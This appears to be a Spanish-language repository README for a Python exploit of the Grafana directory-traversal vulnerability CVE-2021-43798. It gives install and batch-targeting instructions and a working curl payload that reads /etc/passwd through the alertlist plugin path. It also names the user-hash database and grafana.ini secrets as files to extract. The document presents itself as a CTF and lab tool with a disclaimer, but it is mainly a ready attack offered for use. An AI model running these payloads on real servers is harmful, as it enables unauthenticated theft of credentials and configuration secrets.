
📂 Exploit LFI de Grafana (CVE-2021-43798). Extracción automatizada de credenciales y configuración. 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
Script de automatización en Python 3 para explotar la vulnerabilidad de Local File Inclusion (LFI) en Grafana (versiones de la 8.0.0 a la 8.3.0). Este exploit permite realizar un directory traversal para leer archivos sensibles del sistema operativo sin autenticación. ✨ Características
Compatibilidad Python 3.10+: Parcheado para funcionar con versiones modernas de Python (corrección de collections.Mapping).
Escaneo por Lote: Capacidad para procesar múltiples objetivos mediante un archivo targets.txt.
Descifrado de Datos: Incluye módulos para el manejo de sesiones y datos cifrados de Grafana.
Optimizado para CTF: Salida limpia y directa, ideal para laboratorios como HackTheBox y TryHackMe.
🛠️ Requisitos e Instalación
Debido a las dependencias de librerías antiguas, se recomienda instalar los siguientes paquetes: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
Nota: Si usas Python 3.10 o superior, el script incluye un parche automático para la compatibilidad con collections.abc.
🚀 Uso
Configurar objetivos: Añade las URLs (con puerto) en el archivo targets.txt.
Bash
echo "http://10.129.234.47:3000" > targets.txt
Ejecutar el exploit:
Bash
python3 exploit.py
🎯 Objetivos comunes de lectura (LFI)
Una vez ejecutado, puedes intentar leer archivos críticos como:
/etc/passwd (Usuarios del sistema)
/var/lib/grafana/grafana.db (Base de datos con hashes de usuarios)
/etc/grafana/grafana.ini (Configuración y secretos)
💡 Método Alternativo (Manual)
Si prefieres no usar el script, puedes explotar el LFI directamente vía curl: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ Disclaimer
Este repositorio ha sido creado con fines exclusivamente educativos y para su uso en entornos controlados (CTFs, laboratorios). El autor no se responsabiliza del mal uso de esta herramienta. 🏷️ Topics (Etiquetas)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal